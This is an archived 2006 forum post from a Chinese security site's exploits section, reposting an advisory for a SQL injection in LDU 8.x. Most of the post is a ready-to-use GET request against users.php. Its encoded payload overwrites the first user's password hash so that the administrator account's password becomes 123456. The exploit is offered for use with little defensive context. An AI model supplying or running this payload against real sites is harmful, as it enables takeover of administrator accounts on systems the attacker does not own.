LDU <= 8.x (avatarselect id) Remote SQL Injection Vulnerability(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

pub!1c 2006-11-22 12:01

LDU <= 8.x (avatarselect id) Remote SQL Injection Vulnerability

[code]<pre>LDU <= 8.x Remote SQL Injection (avatarselect id) Vulnerability
Discovered by: nukedx
Contacts: ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: [url]http://www.nukedx.com[/url]
Original advisory can be found at: [url]http://www.nukedx.com/?viewdoc=51[/url]
----
GET -> [url]http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[/url][SQL Inject]
GET -> [url]http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527[/url],user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of LDU to 123456
The XVALUE comes with your avatarselect link it's special to everyuser in LDU.
For using this vulnerability you must be logged in to LDU...

</pre>[/code]

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

LDU &lt;= 8.x (avatarselect id) Remote SQL Injection Vulnerability

LDU <= 8.x (avatarselect id) Remote SQL Injection Vulnerability